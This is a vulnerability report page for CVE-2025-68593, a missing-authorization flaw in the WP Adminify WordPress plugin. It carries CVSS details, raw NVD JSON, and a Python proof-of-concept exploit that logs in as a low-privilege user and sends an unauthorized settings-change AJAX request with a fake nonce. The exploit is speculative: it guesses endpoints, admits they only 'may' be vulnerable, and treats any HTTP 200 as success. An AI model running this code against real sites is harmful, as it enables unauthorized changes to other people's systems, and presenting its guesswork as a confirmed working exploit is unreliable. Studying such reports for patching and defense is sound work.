Security Vulnerability Report
中文
CVE-2025-68593 CVSS 5.4 MEDIUM

CVE-2025-68593

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35

Description

Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Adminify: from n/a through <= 4.0.6.1.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP Adminify <= 4.0.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68593 PoC - WP Adminify <= 4.0.6.1 Missing Authorization # This PoC demonstrates exploiting the broken access control vulnerability # in WP Adminify plugin to perform unauthorized administrative actions import requests import sys from urllib.parse import urljoin def exploit_wp_adminify(target_url, username, password): """ Exploit for CVE-2025-68593: Missing Authorization in WP Adminify Args: target_url: Target WordPress site URL username: Low-privilege WordPress user account password: Password for the user account """ # Setup session session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = urljoin(target_url, '/wp-login.php') login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f'[*] Authenticating as low-privilege user: {username}') response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in str(session.cookies) and '/wp-admin/' not in response.url: print('[-] Authentication failed!') return False print('[+] Authentication successful!') # Step 2: Identify vulnerable endpoint in WP Adminify # The plugin's adminify/admin-columns.php or similar endpoints # may lack proper capability checks vulnerable_endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/adminify/v1/settings', '/wp-admin/admin.php?page=adminify_settings' ] print('[*] Testing vulnerable endpoints for broken access control...') # Step 3: Exploit - Send unauthorized administrative request # This example targets adminify settings modification exploit_data = { 'action': 'adminify_save_settings', 'nonce': 'exploit', # May not be properly validated 'settings': { 'adminify_option': 'malicious_value', 'enable_adminify_feature': '1' } } ajax_url = urljoin(target_url, vulnerable_endpoints[0]) response = session.post(ajax_url, data=exploit_data) if response.status_code == 200: print('[+] Exploit request sent successfully!') print(f'[+] Response: {response.text[:200]}') print('[*] The low-privilege user may have successfully') print(' performed an administrative action.') return True else: print(f'[-] Exploit failed with status: {response.status_code}') return False if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve_2025_68593_poc.py <target_url> <username> <password>') print('Example: python cve_2025_68593_poc.py http://example.com subscriber password123') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_wp_adminify(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68593", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:26.697", "lastModified": "2026-04-27T19:16:34.903", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Liton Arefin WP Adminify adminify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Adminify: from n/a through <= 4.0.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/adminify/vulnerability/wordpress-wp-adminify-plugin-4-0-6-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}